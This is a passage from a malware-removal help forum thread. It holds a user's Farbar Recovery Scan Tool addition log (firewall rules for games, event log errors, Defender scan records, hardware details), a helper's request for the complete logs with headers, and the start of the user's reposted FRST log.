FirewallRules: [{59C0890E-1D74-471F-B3F6-3F0DFB64CD8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{E40EC143-367E-4D37-A2AA-34EBAC71DE8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{3A662476-6436-4340-BDBA-D72F5B1DDBCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [{2C981B99-5654-4040-AB2C-0C85F9BF7F6D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [TCP Query User{648A1015-13D1-4750-959B-B3707421499C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{168C3E0D-E85E-4884-A7C9-B97F50C07352}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{F3243ACC-FECE-4A39-814F-08991E028BD7}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [UDP Query User{9F956304-1916-4BBE-B51E-B9955FA67210}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [{72AFCC65-2896-411A-86AB-C02C9CDECE95}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [{4E2F0CD6-5EBE-4A56-9ACE-A151BB38F9D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [TCP Query User{6A6EAC4D-2160-4919-9E3B-52A6F2148730}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{9792E1CF-36FA-4196-A0A3-10AE3AD1A005}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [{CFD8B036-590C-4835-9836-19C2225A051D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [{C94C221F-D765-409C-9AB1-EB9B32BEF9EC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [TCP Query User{8F0BC06D-47BF-4A1B-8748-76D98EA42492}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [UDP Query User{8C990EE8-302F-4E35-BE93-F404C8D857C8}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [{58A4BBA7-11E4-4337-992B-6CF72F8D65AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [{5805045B-A6F2-48E9-ADE3-6136EF9A8988}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [TCP Query User{EA95B6C7-268C-467F-84CD-4FB5AC97A4FC}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
FirewallRules: [UDP Query User{1CE7380D-889B-43D9-9F29-2EDADE5CBBC4}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
FirewallRules: [TCP Query User{E45A8FBA-CC96-4DBD-907C-CD0FFA1E1E2F}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [UDP Query User{71A2705A-4191-47D8-940A-1166319F2FA9}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [TCP Query User{1B3540C0-880A-4830-8EA9-F4E767B15295}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [UDP Query User{7DC1365C-3980-42E2-8358-9FBD287115ED}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [{03ECDC1B-87E1-4ADD-8478-838BEA1ADAC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{82B24CAA-22CD-474F-9603-C584E23551C7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{C104DE8D-F4CA-4B1B-8E31-EEEAA8A34C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{60FD9D66-A167-4E88-B93E-C8E846A175B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{3F69A2ED-5DE2-4023-878A-981FC71D1A1A}] => (Allow) C:\Users\Miggy\AppData\Local\Programs\Opera GX\82.0.4227.50\opera.exe => No File
FirewallRules: [{C144C0C8-2B57-421B-86BB-1A7E3AD62915}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe => No File
FirewallRules: [{1F4F8DFE-0CAB-47F0-9183-053E15271167}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => No File
FirewallRules: [{81992F8E-512D-4DA7-9DAC-488D45E25D38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [{8FA454E8-45DF-4A08-8AAA-22B1A63B59A4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [TCP Query User{14653097-6416-4742-9C82-CB6934D75E94}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [UDP Query User{080D84FE-1FEF-4314-AA75-DCB6FD8301F6}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [TCP Query User{25147A68-BF60-45EC-9583-E036CA89AAF4}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{5303B7F7-593C-4FE0-8D06-028805E1A292}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{D9362094-CBEE-45FF-A39E-07BABE2891C8}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{3E2E905F-A92A-4FD0-9610-1E3EA900E7D3}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [TCP Query User{00C1C5F8-22B4-4750-895A-C3290EB3F317}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [UDP Query User{47B0D35C-8AE4-4385-BD07-21CBBFD2FC47}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [{3B141ECB-9639-4E7F-8F76-780368F6DDFF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{34756878-EE88-4AE5-B99F-C95EF86641C8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{8F876A7A-5287-4288-BD35-11D979C8802A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{7763C119-63E6-404D-9836-BD172EBE332B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{04B67B1C-2819-4DBC-A81D-6C6C9EDBB6F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{E13084FB-B670-4131-A5A7-F7DB8373FFCF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8D2CD827-1C1D-4DA6-B7B5-8D580DE48C58}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{0104ADC6-9CAF-4DCA-BE6B-0DA2840D2800}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [TCP Query User{BEBAB357-E674-4617-BD1A-F6AB3FCDB7D2}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{925781FD-FCC4-432F-8C07-D07A1C5EAFC7}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [{637A7132-8D14-42F8-920B-B680BCA48683}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{F64D2521-B66A-4829-8FBE-C10617C50F8D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{B59E8386-4265-4E90-BAF8-CAD8DECCE6D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{FCF2F178-BD0F-47A7-8F44-E9DCD60B4DC1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{3835BCC7-FABB-4D0F-81A0-DD004D72FD79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [{6E906B8E-DECB-426F-98F9-98530E0E9838}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [TCP Query User{EA2280C2-20B0-42F1-8974-CA8D4D530938}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [UDP Query User{E5CC6F2D-4A52-4C56-A097-FEA84E711E27}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [{0BA33FB8-0DDA-473D-9A0F-69C2664D21D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{6217A59E-EBE3-4859-9E09-13C70D22D77C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{93C48266-F67B-414C-8798-072A31D4A908}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{573A6C3A-5FD0-496E-B86A-01C574A076AE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [TCP Query User{0D3DB0DC-AC15-4DCC-AE15-C16DF0FA0FF8}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{34131973-3A86-4AA5-A1E3-43D38FAFCBAB}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{10B7ADFC-36E5-4136-8904-4BB2274FE63C}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [UDP Query User{47D1A8F9-9D77-4C46-99BE-D8821B3F3E1D}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [{FEF65CC4-341A-4FD2-A824-A6D329480713}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{6749EDCE-B127-4A53-A5AF-90CE152BAD78}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{171A237C-E9C7-4615-8B1E-5C9C788979AD}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D6F304CE-E1E7-4468-A75D-139D43303668}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{AD0903A5-230D-40EC-9560-A4EDEA0FC48D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BAC90EB2-EF43-4263-B3F9-FC92B93BF152}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{61834926-009D-423A-BDD2-E8081CBEB7D5}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [UDP Query User{13EE0F33-1B8A-4274-9855-871FD73A4497}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [{8C3803A5-EA5C-4889-9857-9FDB4DA23242}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{01E21564-B49B-48F9-8E36-D8CF45BEEEDC}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [UDP Query User{0F00EB50-6FA3-4928-9F2C-945043197824}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [{6486CC56-8E36-4F5B-84C6-D5DFA851ACB3}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.49\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6F92321E-DF3A-45A7-A575-6A779E9B8D46}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{8BF615D7-A12A-483A-A40A-BFE9D6F2C0A6}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{753ADBE4-FB37-42A8-8798-757F858B08C2}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{A6F6C4AB-87DA-4C6B-ADED-12C8F7909461}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{6717B840-E914-4EFE-BE62-1FB363E7F09A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{61A809E9-FEB5-46ED-8906-BDFAA3FF8A94}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{93A10216-66C0-42BF-ABC4-0342110C8055}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{52240A98-1551-4AB2-B3A2-64624335D754}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{CAAC3CD2-7CDF-4592-BFFE-01EEEA05AF16}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{E1C306E0-1DDD-47AA-BB45-826B3153976D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
==================== Restore Points =========================
10-07-2022 16:42:28 Installed DirectX
13-07-2022 18:22:15 Removed Dual-Core Optimizer.
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (07/16/2022 12:10:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1900
Faulting application start time: 0x01d8994707d5ecc9
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 36d0ee37-f58a-43d9-be8b-9c2b8115e329
Faulting package full name:
Faulting package-relative application ID:
Error: (07/15/2022 11:05:01 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 103.0.5060.114 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 63d0
Start Time: 01d898d58448bb99
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Report Id: dffcbb73-8528-4d0c-8ea2-70a8d5a2c018
Faulting package full name:
Faulting package-relative application ID:
Hang type: Top level window is idle
Error: (07/15/2022 07:09:09 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: The storage optimizer couldn't complete retrim on \\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ because: The operation requested is not supported by the hardware backing the volume. (0x8900002A)
Error: (07/15/2022 07:03:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x3b84
Faulting application start time: 0x01d898b787859d26
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: b97d719a-87ab-4cea-b3b9-e6f2b32fa6c1
Faulting package full name:
Faulting package-relative application ID:
Error: (07/15/2022 06:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x14d54
Faulting application start time: 0x01d898b3a05eeb43
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 71427424-3c9f-4244-8dfc-4bb4775f7720
Faulting package full name:
Faulting package-relative application ID:
Error: (07/14/2022 11:14:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x4b54
Faulting application start time: 0x01d898116a40ca06
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 115e5758-376d-43b8-bb14-610180db1fcd
Faulting package full name:
Faulting package-relative application ID:
Error: (07/14/2022 03:53:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BatmanAC.exe, version: 1.1.0.0, time stamp: 0x520000f7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000001
Faulting process id: 0x5a34
Faulting application start time: 0x01d897cab8eff5b5
Faulting application path: C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
Faulting module path: unknown
Report Id: f43d4c35-394f-4595-a573-547c1cd90170
Faulting package full name:
Faulting package-relative application ID:
Error: (07/14/2022 11:42:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1904
Faulting application start time: 0x01d897b0d663f446
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 8df2ef94-e121-4e25-b9da-0d4cbd2ae1b7
Faulting package full name:
Faulting package-relative application ID:
System errors:
=============
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 11:55:42 PM) (Source: DCOM) (EventID: 10005) (User: MIGGYPC)
Description: DCOM got error "1053" attempting to start the service BcastDVRUserService_ae76358 with arguments "Unavailable" in order to run the server:
Windows.Media.Capture.Internal.AppCaptureShell
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The GameDVR and Broadcast User Service_ae76358 service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the GameDVR and Broadcast User Service_ae76358 service to connect.
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Windows Defender:
================
Date: 2022-07-15 19:09:08
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-14 11:53:58
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-11 19:01:40
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-10 18:38:28
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-07 18:00:59
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
==================== Memory info ===========================
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor
Percentage of memory in use: 87%
Total physical RAM: 8139.07 MB
Available physical RAM: 1034.94 MB
Total Virtual: 20939.07 MB
Available Virtual: 10638.51 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:475.83 GB) (Free:128.86 GB) (Model: TEAM T253X2512G) NTFS
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
Partition: GPT.
Attempted reading MBR returned 0 bytes.
Could not read MBR for disk 1.
==================== End of Addition.txt =======================
#4
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 16 July 2022 - 04:34 PM
Hi,
It appears that the headers for both FRST and Addition logs are missing.
I need the complete logs for analysis, please copy and paste the logs again with the headers included as well.
Kind regards,
Axe0
Axe0
#5
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 16 July 2022 - 04:48 PM
My apologies, heres my FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-07-2022
Ran by Miggy (administrator) on MIGGYPC (Gigabyte Technology Co., Ltd. A320M-S2H) (16-07-2022 14:40:46)
